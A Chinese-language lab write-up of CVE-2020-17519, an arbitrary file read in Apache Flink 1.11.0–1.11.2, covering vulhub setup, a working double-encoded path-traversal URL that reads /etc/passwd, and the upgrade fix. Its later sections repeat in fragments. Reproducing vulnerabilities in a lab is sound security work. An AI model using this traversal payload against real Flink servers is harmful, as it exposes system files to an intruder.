一、漏洞概述
Apache Flink是一个开源流处理框架，具有强大的流处理和批处理功能。Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

二、影响版本

1.11.0、1.11.1、1.11.2

三、环境搭建

使用vulhub进行安装

wget https://github.com.cnpmjs.org/vulhub/vulhub/archive/master.zip -O vulhub-master.zip
unzip vulhub-master.zip
cd vulhub-master/flink/CVE-2020-17519
docker-compose up -d

然后访问： http://192.168.24.112:8081

四、漏洞复现
Poc

http://192.168.24.112:8081/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

读取成功

五、修复建议

升级到安全版本

安全版本：

Flink 1.11.3或Flink 1.12.0

一、漏洞概述 Apache Flink是一个开源流处理框架，具有强大的流处理和批处理功能。Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

二、影响版本

三、环境搭建

四、漏洞复现 Poc

五、修复建议

一、漏洞概述
Apache Flink是一个开源流处理框架，具有强大的流处理和批处理功能。Apache Flink 1.11.0中引入的一个更改(也在1.11.1和1.11.2中发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。

四、漏洞复现
Poc